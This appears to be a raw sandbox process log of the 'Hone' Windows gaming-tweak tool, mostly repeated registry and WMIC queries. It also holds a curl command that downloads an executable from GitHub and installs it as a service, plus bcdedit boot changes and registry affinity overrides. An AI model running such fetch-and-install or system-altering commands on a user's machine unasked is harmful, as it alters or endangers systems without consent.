C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\sc.exe
sc config "STR" start= auto
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\curl.exe
curl -g -L -# -o "C:\Hone\Resources\SetTimerResolutionService.exe" "https://github.com/auraside/HoneCtrl/raw/main/Files/SetTimerResolutionService.exe"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /i SetTimerResolutionService.exe
C:\Windows\system32\sc.exe
sc config "STR" start=auto
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get buildnumber /value
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformtick
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v AffinityTweaks /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfCores /value | find "="
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get NumberOfCores /value
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfLogicalProcessors /value | find "="
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get NumberOfLogicalProcessors /value
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_USBController get PNPDeviceID| findstr /l "PCI\VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_USBController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /l "PCI\VEN_"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "08" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get PNPDeviceID| findstr /l "PCI\VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /l "PCI\VEN_"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "02" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID| findstr /l "PCI\VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /l "PCI\VEN_"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "04" /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\sc.exe
sc config "STR" start= auto
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\sc.exe
sc config "STR" start=auto
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get buildnumber /value
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformtick
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
